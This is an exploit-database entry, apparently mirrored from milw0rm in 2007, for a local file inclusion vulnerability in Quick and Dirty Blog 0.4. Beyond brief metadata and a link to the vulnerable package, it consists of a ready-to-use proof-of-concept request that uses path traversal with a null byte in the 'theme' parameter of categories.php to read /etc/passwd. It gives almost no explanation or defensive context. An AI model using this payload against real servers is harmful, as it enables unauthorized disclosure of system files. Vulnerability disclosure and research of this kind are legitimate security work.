Quick and Dirty Blog (qdblog) 0.4 - categories.php Local File Inclusion

2007-11-03T00:00:00
ID EXPLOITPACK:9D994974F036ADCC23859507D882F2D1
Type exploitpack
Reporter GoLd_M
Modified 2007-11-03T00:00:00

Description

Quick and Dirty Blog (qdblog) 0.4 - categories.php Local File Inclusion

                                        
                                            Quick and Dirty Blog 0.4 (categories.php) Local File Inclusion Vulnerability
http://heanet.dl.sourceforge.net/sourceforge/qdblog/qdblog-0.4.tar.bz2
POC:
  /categories.php?theme=../../../../../../../../../etc/passwd%00

# milw0rm.com [2007-11-03]